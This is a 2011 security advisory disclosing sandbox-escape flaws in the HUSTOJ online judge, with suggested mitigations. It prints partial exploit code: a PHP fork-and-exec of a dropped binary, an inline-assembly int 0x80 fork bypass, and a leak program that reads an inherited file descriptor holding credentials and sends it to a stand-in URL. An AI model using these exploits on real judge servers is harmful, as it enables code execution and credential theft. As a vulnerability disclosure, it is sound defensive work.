Title: Security Holes Discovered in HUSTOJ
Author: LIU Yu <pineapple.liu@gmail.com>
Source: OpenJudge Alliance Technical Report (TR-OJA-201112A)
Date: 2011/12/09 (last revised on 2011/12/25)
Version: 1.4
License: Creative Commons Attribution-ShareAlike 3.0 License (CC BY-SA 3.0)
URL: http://openjudge.net/TR/201112A


Security Holes Discovered in HUSTOJ

by LIU Yu <pineapple.liu@gmail.com>

Abstract: Security vulnerabilities have been discovered in the open-source online judge system HUSTOJ (project site http://code.google.com/p/hustoj/). Due to a series of design pitfalls and defects in the judge_client component of HUSTOJ, attackers can submit malicious solution programs that bypass most security restrictions of HUSTOJ. Validated security issues include, but are not limited to, 1) executing arbitrary binary programs on the judge server, 2) leakage of system information, and 3) leakage of test data.

1. Introduction

Online judge systems [1] are a special kind of web-based automatic program testing and grading system for ACM/ICPC-like programming contests and for assignment evaluation in IT/CS courses such as data structures and algorithm design. For more than a decade, universities and educational institutions worldwide have shown increasing interest in setting up private or public online judges to facilitate relevant educational activities. Because an online judge system has to receive and execute user-submitted program code, security has always been the top concern when developing and (or) deploying such systems [1].

HUSTOJ [2] is an online judge system initiated by former ACM/ICPC contestant(s) from Huazhong University of Science and Technology (HUST). It was first released on Google Code in Nov. 2008 under the GNU General Public License 2.0. As of Dec. 2011, the HUSTOJ development team has 8 members. As HUSTOJ has become popular, especially among educational institutions in the Asia-Pacific region [2], some security issues, such as [3], have been identified and reported.

The OpenJudge Alliance [4], as a community specializing in the technical aspects of automated computer program grading, feels obliged to conduct a systematic assessment of the security of HUSTOJ based on our expertise. Our preliminary review of the source code of HUSTOJ's core judge_client component is disappointing: we discovered critical security holes resulting from a series of design pitfalls and implementation defects. Based on these holes, we were able to compose two exploits that, when submitted to HUSTOJ hosts as solution programs, succeeded in executing arbitrary binary code on some HUSTOJ judge servers. Validated security risks include, but are not limited to, leaking system information, leaking test data, and opening TCP/IP connections to a third-party host on the Internet.

This report is organized as follows. In Section 2, we review the functionalities and design pitfalls of the judge_client component of HUSTOJ. In Section 3, two exploits are proposed and validated based on the security risks identified from the design pitfalls. Finally, Section 4 presents concluding remarks and our recommendations to HUSTOJ hosts as well as developers.

2. Review of Judge Client Design

The judge_client component of HUSTOJ is an all-in-one program for 1) setting up the test environment (downloading test data and solution code, preparing the chroot jail, etc.), 2) compiling the solution code, 3) executing the solution code and collecting results / statistics, 4) reporting judge results to the database server, and 5) performing anti-plagiarism detection. This review is based on source code revision r1334, available at http://code.google.com/p/hustoj/source/browse/?r=1334. Some of the reported security issues also affect more recent revisions (e.g. the current SVN head, r1364).

Pitfall 1: Monolithic All-In-One Design

The judge_client component is a multi-process program running on i386 / x86_64 Linux systems (i.e. the judge server). The solution program (or, for interpreted languages such as Java, PHP and Python, the interpreter of the solution code) is executed in a traced subprocess of judge_client. The problem with this design is that the subprocess starts as a duplicate of judge_client at the moment the latter calls fork(). Resources that judge_client acquires before calling fork(), including open file descriptors and open directory streams, are inherited by the subprocess, and descriptors not marked close-on-exec survive the subsequent execl() as well. This makes it possible for the solution program to inspect data belonging to judge_client.
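One general mitigation is to make sure no inherited descriptor outlives the execl() that starts the solution program. The sketch below assumes it is called in the child between fork() and execl(); the helper name mark_fds_cloexec() is ours, not part of HUSTOJ. It sets FD_CLOEXEC on every open descriptor above stderr, which also covers the descriptors backing open directory streams.

```c
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper (not part of HUSTOJ): call it in the child after
 * fork() and before execl(). Every open descriptor above stderr gets
 * FD_CLOEXEC, so the kernel closes it when execl() loads the solution
 * program. Returns the number of descriptors that were marked. */
int mark_fds_cloexec(void)
{
    long max = sysconf(_SC_OPEN_MAX);
    int marked = 0;

    if (max < 0)
        max = 1024;                  /* fallback if the limit is unknown */
    for (int fd = 3; fd < max; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags == -1)
            continue;                /* descriptor is not open */
        if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0)
            marked++;
    }
    return marked;
}
```

Opening sensitive files with O_CLOEXEC in the first place achieves the same effect for individual descriptors; the sweep above is a safety net for descriptors that were opened without it.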

The following snippet of the main() function in judge_client.cc shows what has been done before calling fork(). When started, judge_client loads its configuration, downloads test data and solution code from the database server, compiles the solution code, and copies the runtime support of the solution program into a chroot jail.

int main(int argc, char** argv)
{
    ...
    init_parameters(...);
    init_mysql_conf();
    ...
    get_solution_info(...);
    get_problem_info(...);
    get_solution(...);
    ...
    compile(...);
    ...
    copy_<lang>_runtime(...);
    ...
    pid_t pidApp = fork();
    ...

The most critical information processed by judge_client before calling fork() is perhaps the content of the local judge.conf file, which holds the user name and password of the database server in clear text. A defect in the init_mysql_conf() function leaves this file open after the configuration has been loaded, so the open file descriptor is available for reading by the solution program (issue 1)! Section 3 shows how the proposed exploits do this.

void init_mysql_conf()
{
    ...
    FILE *fp;
    ...
    fp = fopen("./etc/judge.conf", "r");
    ...
}

Of course, the solution program knowing this information does not by itself pose a security risk. But as we shall see later, other pitfalls of judge_client make it possible for the solution program to leak this information outside the judge server.
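The fix for issue 1 itself is to release the stream as soon as parsing is done. The sketch below is a hypothetical replacement loader, not HUSTOJ's code; it assumes judge.conf consists of simple KEY=VALUE lines and returns one value per call, closing the file on every path.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical loader: copy the value of `key` from a KEY=VALUE file into
 * buf (at most len bytes, NUL-terminated). The stream is closed on every
 * path, so no descriptor is left for a later fork() to hand down.
 * Returns 0 if the key was found, -1 otherwise. */
int read_conf_value(const char *path, const char *key, char *buf, size_t len)
{
    FILE *fp = fopen(path, "r");
    char line[512];
    size_t klen = strlen(key);
    int found = 0;

    if (fp == NULL)
        return -1;
    while (!found && fgets(line, sizeof line, fp) != NULL) {
        if (strncmp(line, key, klen) == 0 && line[klen] == '=') {
            line[strcspn(line, "\r\n")] = '\0';   /* drop the line ending */
            snprintf(buf, len, "%s", line + klen + 1);
            found = 1;
        }
    }
    fclose(fp);                                   /* the missing step */
    return found ? 0 : -1;
}
```

Calling it once per setting re-reads the file each time, which is acceptable for a handful of keys; a loader that fills a whole struct in one pass would follow the same open, parse, fclose() pattern.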

Pitfall 2: User-Mode Tracing of Multi-Process/-Thread Program

The judge_client component uses ptrace() to intercept system calls made by the solution program. The developers of HUSTOJ appear to want all supported languages to fit within a unified judge framework, and to support interpreted programming languages such as Java, Python, PHP, Perl, etc., they allow multi-process / -thread solution programs. Unfortunately, sandboxing a multi-process / -thread program through pure user-mode ptrace() is practically NOT a reliable way to enforce security [5,6].

Even setting aside state-of-the-art attacks such as the TOCTTOU races in [6], HUSTOJ's judge_client is crippled in the way it intercepts system calls. A snippet of judge_client.cc shows that it only watches the main process of the solution program; any subprocess spawned from the main process is completely ungoverned. In other words, as long as the solution program can spawn a subprocess (i.e. through any of SYS_fork(), SYS_vfork(), or SYS_clone() on Linux), the subprocess can do anything allowed for user judger (i.e. uid 1536) (issue 2).

void run_solution(...)
{
    ...
    setrlimit(...);
    ...
    chroot(...);
    setuid(1536);
    ...
    ptrace(PTRACE_TRACEME, ...);
    ...
    execl(...);
    ...
...
void watch_solution(...)
{
    ...
    while (1)
    {
        wait4(...);
        ...
        ptrace(PTRACE_GETREGS, ...);
        ...
        ptrace(PTRACE_SYSCALL, ...);
    }
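Linux ptrace() can be asked to follow a tracee's children automatically. The hypothetical helper below (name and placement are our assumptions) sets the fork/vfork/clone tracing options, so every new process or thread starts under the same tracer instead of running free. It must be called while the tracee is in a ptrace-stop, for example right after the first wait4() in watch_solution().

```c
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>

/* Hypothetical helper: make the kernel attach the tracer to every process
 * or thread the tracee creates via fork(), vfork() or clone().
 * TRACESYSGOOD marks syscall-stops with SIGTRAP | 0x80 so they can be
 * told apart from real SIGTRAPs. Returns 0 on success, -1 on error. */
long trace_descendants(pid_t pid)
{
    long opts = PTRACE_O_TRACEFORK | PTRACE_O_TRACEVFORK |
                PTRACE_O_TRACECLONE | PTRACE_O_TRACESYSGOOD;

    return ptrace(PTRACE_SETOPTIONS, pid, NULL, (void *)opts);
}
```

With these options set, the watch loop would also have to wait on any traced child (for example wait4(-1, &status, __WALL, &usage)) rather than on pidApp alone, and apply the same checks to every pid it reports. Even then, ptrace-based interposition remains exposed to the races described in [5,6].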

From okcalls.h we can learn which system call numbers are considered "safe" for each supported programming language. Notably, SYS_clone() is granted for Java, PHP, and C# (Mono) (issue 3a), while SYS_open() and SYS_execve() are always allowed. Because i386 and x86_64 Linux systems have different system call ABIs, the allowed system call numbers are listed separately in okcalls.h.

...
#ifdef __i386__
...
int LANG_CV[256]={...,SYS_open,...,SYS_execve,...};
int LANG_JV[256]={...,SYS_clone,...,SYS_execve,...};
...
#else
...
int LANG_CV[256]={...,SYS_open,...,SYS_execve,...};
int LANG_JV[256]={...,SYS_clone,...,SYS_execve,...};
...
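Keeping one list per ABI only helps if every observed call number is looked up in the list of the ABI it actually came through. The sketch below uses small illustrative white lists (not HUSTOJ's) with the numbers written out literally, so it compiles on any host and makes the collision visible: 2 is open() on x86_64 but fork() on i386.

```c
#include <stdbool.h>
#include <stddef.h>

/* Illustrative white lists, keyed by ABI (hypothetical, not okcalls.h):
 *   x86_64: read = 0, write = 1, open = 2, close = 3
 *   i386:   exit = 1, read = 3, write = 4, open = 5, close = 6
 * Number 2 (fork on i386) is deliberately absent from the i386 list. */
enum abi { ABI_X86_64, ABI_I386 };

static const long allow_x86_64[] = { 0, 1, 2, 3 };
static const long allow_i386[]   = { 1, 3, 4, 5, 6 };

static bool in_list(const long *list, size_t n, long nr)
{
    for (size_t i = 0; i < n; i++)
        if (list[i] == nr)
            return true;
    return false;
}

/* A call number is only meaningful together with the ABI it came from. */
bool syscall_allowed(enum abi abi, long nr)
{
    if (abi == ABI_X86_64)
        return in_list(allow_x86_64,
                       sizeof allow_x86_64 / sizeof allow_x86_64[0], nr);
    return in_list(allow_i386, sizeof allow_i386 / sizeof allow_i386[0], nr);
}
```

For example, syscall_allowed(ABI_X86_64, 2) accepts open(), while syscall_allowed(ABI_I386, 2) rejects fork(). Determining the correct ABI for each stop is a separate problem.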

Unfortunately, the way judge_client inspects system calls leads us to believe that the developers of HUSTOJ are unaware that an x86_64 program can invoke system calls from both the i386 and the x86_64 land. A closer look at the watch_solution() function in judge_client.cc reveals that judge_client always checks the observed system call number, i.e. the value stored in the ORIG_RAX register, against the white list of native system calls, regardless of the code segment register (CS) and of the instruction that initiated the system call. When a 64bit solution program invokes system calls from 32bit land [12], judge_client attributes the call numbers to the wrong system calls, and, as we shall see in Section 3, an "unsafe" system call can slip through by mistake (issue 3b).

...
#define REG_SYSCALL orig_rax
#define REG_RET rax
...
void watch_solution(...)
{
    ...
    ptrace(PTRACE_GETREGS, pidApp, NULL, &reg);
    if (call_counter[reg.REG_SYSCALL] == 0)
    {
        ACflg = OJ_RE;
        ...
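A tracer can recover the ABI at a syscall-entry stop from the two pieces of state the paragraph above mentions: the CS register and the instruction that entered the kernel. On x86_64 the saved RIP points just past that instruction, so its two bytes can be fetched from RIP - 2 with PTRACE_PEEKTEXT. The hypothetical helper below classifies them. Note that CS alone is not enough: int $0x80 issued from 64-bit code runs with CS 0x33 yet uses the 32-bit table. The sketch ignores the x32 ABI, and reading code bytes is itself racy against other threads of a multi-threaded tracee.

```c
#include <stdint.h>

enum syscall_abi { ABI_X86_64, ABI_I386, ABI_UNKNOWN };

/* Hypothetical helper for an x86_64 tracer at a syscall-entry stop.
 *   cs   : regs.cs from PTRACE_GETREGS
 *   insn : the two bytes just before regs.rip
 * On x86_64 Linux, 0x33 is the 64-bit user code segment and 0x23 the
 * 32-bit compatibility one. */
enum syscall_abi classify_syscall_abi(uint64_t cs, const unsigned char insn[2])
{
    int is_syscall  = insn[0] == 0x0f && insn[1] == 0x05;  /* syscall   */
    int is_sysenter = insn[0] == 0x0f && insn[1] == 0x34;  /* sysenter  */
    int is_int80    = insn[0] == 0xcd && insn[1] == 0x80;  /* int $0x80 */

    /* int $0x80 and sysenter always use the 32-bit table, even from
     * 64-bit code (CS 0x33): the case judge_client misses. */
    if (is_int80 || is_sysenter)
        return ABI_I386;
    if (is_syscall && cs == 0x33)
        return ABI_X86_64;
    if (is_syscall && cs == 0x23)
        return ABI_I386;
    return ABI_UNKNOWN;             /* treat anything else as a violation */
}
```

The result would then select which white list REG_SYSCALL is checked against. Much later kernels (Linux 5.3 onward) also offer PTRACE_GET_SYSCALL_INFO, which reports the architecture of each call directly.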

Moreover, according to [7], the list of accepted system calls is generated with strace [8] without following the subprocesses of the sample program (issue 4). This can both admit unnecessary or insecure system calls and miss some system calls that should be allowed.

Pitfall 3: Excessive Permissions of Solution Program

The solution program is executed as a special user judger (uid 1536). Although judge_client uses a chroot jail to keep the solution program away from other parts of the operating system, the excessive permissions granted to judger are still a source of security risks. These permissions cannot be identified directly from the source code of judge_client. Nevertheless, the exploits presented in Section 3 reveal that judger can at least write files to the chroot jail and make TCP/IP connections to a third-party host on the Internet! (issue 5)
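Part of issue 5 can be addressed while the child still runs as root, before it switches to judger. The sketch below is hypothetical (the function name and call site are our assumptions): it moves the child into a fresh network namespace, which requires a kernel with network namespace support and CAP_SYS_ADMIN, and then drops supplementary groups, gid and uid in that order. It does not make the jail read-only; that still has to be arranged on the file system side.

```c
#define _GNU_SOURCE
#include <grp.h>
#include <sched.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical sketch (not HUSTOJ code): run as root in the child after
 * chroot() and before execl(). Returns 0 on success, -1 on any failure,
 * in which case the caller should abort instead of running the solution. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* A fresh network namespace has only a downed loopback interface,
     * so connections to outside hosts fail. */
    if (unshare(CLONE_NEWNET) != 0)
        return -1;
    /* Groups and gid must be dropped while we are still root. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Sanity check: regaining root must now be impossible. */
    if (setuid(0) == 0)
        return -1;
    return 0;
}
```

In judge_client's terms this would replace the bare setuid(1536) in run_solution(), e.g. drop_privileges(1536, 1536), with the call failing closed if any step is refused.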

3. Proposed Exploits

Recall from Section 2 that, due to issue 2, if the solution program can spawn a subprocess through any of SYS_fork(), SYS_vfork(), or SYS_clone(), the spawned subprocess becomes ungoverned and can do anything granted to user judger. In fact, this can be achieved in the following two ways.

Exploit 1: SYS_clone through Interpreted Languages

Recall from issue 3a that judge_client grants SYS_clone() to interpreted languages including Java, PHP, and C# (Mono). We chose PHP as the sample language for the first exploit. It does three things: 1) spawns a subprocess through pcntl_fork() (which internally invokes SYS_clone()); 2) in the main process, loops for a short period of time; 3) in the child process, writes a binary program to the chroot jail of the judge server (cf. issue 5) and executes it through pcntl_exec() (which internally invokes SYS_execve()). For legibility, we only reproduce a portion of the exploit code here; the complete source code can be obtained from [13]. Note that the variable $code in function child() holds a base64-encoded Linux ELF program, which we call leak.

<?php
  function child()
  {
      $code = 'f0VMRgIBAQAAAAAAAAAAAAIAPg...';
      $code_cmd = './leak';
      if ($handle = @fopen($code_cmd, 'w'))
      {
          @fwrite($handle, base64_decode($code));
          @fclose($handle);
          @chmod($code_cmd, 0775);
          @pcntl_exec($code_cmd, array("0"));
      }
      return 0;
  }
  function traced()
  {
      for ($i = 0; $i < 30000000; $i++);
      return 0;
  }
  $pid = @pcntl_fork();
  if ($pid == 0)
  {
      exit(child());
  }
  exit(traced());
?>

Exploit 2: SYS_fork through C++ Inline Assembly

The second exploit originates from [12] and takes advantage of issue 3b. On 64bit Linux systems, SYS_open() in 64bit land happens to have the same number, 2, as SYS_fork() in 32bit land. Therefore, if a 64bit solution program invokes system call 2 through the 32bit interface, judge_client takes it as SYS_open(), but the kernel actually executes SYS_fork(). Along these lines, we composed the second exploit in C/C++ with inline assembly. On judge servers running 32bit Linux systems, this exploit is correctly detected and restricted by the respective 32bit judge_client. On 64bit judge servers, however, judge_client is fooled and lets through the 32bit SYS_fork() invoked via INT 0x80. For legibility, we only show a portion of the exploit code here; the complete source code can be obtained from [13]. Functions child() and traced() are analogous to those in Exploit 1 and are omitted to save space.

...
int child();
...
int traced();
...
int main(void)
{
    int pid;
    asm volatile("movl $2, %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0\n": "=r"(pid));
    if (pid == 0)
    {
        return child();
    }
    return traced();
}
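On kernels from Linux 3.5 onward (i.e. after this report was written), seccomp-bpf can close this particular hole inside the kernel: a filter sees the ABI of every call in seccomp_data.arch, which reads AUDIT_ARCH_I386 even for INT 0x80 issued from 64-bit code. The hypothetical function below installs a filter that only checks the architecture and kills the process on any foreign-ABI call. A real sandbox would also reject x32 calls (numbers with bit 0x40000000 set) and then apply a per-call white list in the same filter.

```c
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/prctl.h>

#if defined(__x86_64__)
#define NATIVE_ARCH AUDIT_ARCH_X86_64
#elif defined(__i386__)
#define NATIVE_ARCH AUDIT_ARCH_I386
#elif defined(__aarch64__)
#define NATIVE_ARCH AUDIT_ARCH_AARCH64   /* only so the sketch builds on arm64 */
#endif

/* Hypothetical sketch: kill the calling process on any system call made
 * through a non-native ABI. Call it in the child just before execl().
 * Returns 0 on success, -1 on failure. */
int deny_foreign_abi(void)
{
    struct sock_filter code[] = {
        /* Load the architecture the kernel attributes to this call. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        /* Native ABI: skip the next instruction and allow. */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NATIVE_ARCH, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof code / sizeof code[0]),
        .filter = code,
    };

    /* Required so that an unprivileged process may install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```

Because the filter is inherited across fork() and execve() and cannot be removed, it also applies to any subprocess the solution manages to spawn, which ptrace-based tracing alone does not guarantee.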

The leak Program

To make the proposed exploits more informative, the above-mentioned leak program does three things: 1) reads the first 4kB of a given open file descriptor (cf. issue 1), 2) encodes the content in base64, and 3) sends the encoded string to an HTTP URL (cf. issues 2 and 5). The file descriptor to read is given as the first command line argument of the leak program. For step 3, the leak program could open a socket directly; when used with Exploit 1, we make use of the PHP interpreter to simplify this step. For legibility, we only show a portion of the leak program here; the complete source code can be obtained from [13]. Note that http://some.host.name/... is a fake URL to send the content to, and paste.py is a Python CGI script that accepts and stores HTTP GET data.

...
void encode(FILE *, FILE *, int);
...
int main(int argc, char * argv[])
{
    int fd = ((argc <= 1) ? 0 : atoi(argv[1]));
    lseek(fd, 0, SEEK_SET);
    FILE * fin = fdopen(fd, "r");
    FILE * fout = popen("/php", "w");
    if (fin && fout)
    {
        fprintf(fout, "<?php @fopen('http://some.host.name/paste.py?data='.urlencode('");
        encode(fin, fout, 4 * 1024);
        fprintf(fout, "'), 'r');\n");
    }
    if (fout) pclose(fout);   /* a popen() stream must be closed with pclose() */
    return 0;
}

Validation

Submitting Exploit 1 to the HUSTOJ instance at http://hustoj.sinaapp.com/ as a solution to problem 1015, we confirmed that the exploit works as expected. Because the main process of the PHP script does nothing but busy-loop, the submission got WA (sid 37489). It is possible to actually solve the problem and get AC while exploiting the judge server. We also validated locally that Exploit 2 can escape from the tracing of judge_client running on 64bit Linux systems.

4. Conclusions and Recommendations

We discovered three design pitfalls and six security issues in judge_client, the core component of HUSTOJ, an open-source online judge system [1,2]. Due to these pitfalls, an attacker can execute arbitrary binary code on the judge server.

Following are some recommendations from the OpenJudge Alliance [4].

Recommendations to HUSTOJ Hosts

  • turn OFF all interpreted languages and disable inline assembly for C/C++ in your HUSTOJ systems;
  • withdraw unnecessary permissions from user judger on all your judge server(s);
  • subscribe to the mailing list of OpenJudge Alliance [4] and keep a close eye on the HUSTOJ project site [2] to get the latest update notices.

Recommendations to HUSTOJ Developers

  • decompose the judge_client into a set of small programs;
  • reconsider whether and how to support interpreted programming languages;
  • consider more robust means of security enforcement such as Sandbox Libraries [9], AppArmor [10], SE-Linux [11], etc.;
  • keep up with recent results from the security research community;
  • employ a good / secure coding style.

Frankly speaking, the HUSTOJ project is going through a tough stage that most software systems inevitably face when trying to incorporate new features. In the long run, however, developers of a security-critical system like an online judge cannot be too careful when it comes to bringing in new features.

References

  1. A. Kurnia, A. Lim, B. Cheang. Online Judge. Computers & Education, 36(4), 2001.
  2. HUSTOJ Project. http://code.google.com/p/hustoj/
  3. HUSTOJ (fckeditor) Remote Arbitrary File Upload Exploit. http://www.exploit-db.com/exploits/12697/
  4. OpenJudge Alliance. http://openjudge.net
  5. T. Garfinkel. Traps and pitfalls: Practical problems in system call interposition based security tools. In Proc. Network and Distributed Systems Security Symposium (NDSS), 2003.
  6. R. N. M. Watson. Exploiting Concurrency Vulnerabilities in System Call Wrappers. In Proc. 1st USENIX Workshop on Offensive Technologies (WOOT), 2007.
  7. Add Programming Language to HUSTOJ. http://code.google.com/p/hustoj/wiki/AddProgrammingLanguage
  8. strace. http://en.wikipedia.org/wiki/Strace
  9. Sandbox Libraries. http://openjudge.net/Solutions/LibSandbox
  10. AppArmor. http://en.wikipedia.org/wiki/AppArmor
  11. SE-Linux. http://selinuxproject.org/
  12. C. Evans. Linux syscall interception technologies partial bypass. http://scary.beasts.org/security/CESA-2009-001.html
  13. Source Code of Exploits. http://github.com/openjudge/TR-OJA-201112A

This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License (CC BY-SA 3.0), and code samples are licensed under the New BSD License (3-Clause). Cite this work as,

LIU Yu. Security Holes Discovered in HUSTOJ. OpenJudge Alliance Technical Report (TR-OJA-201112A), 2011 http://openjudge.net/TR/201112A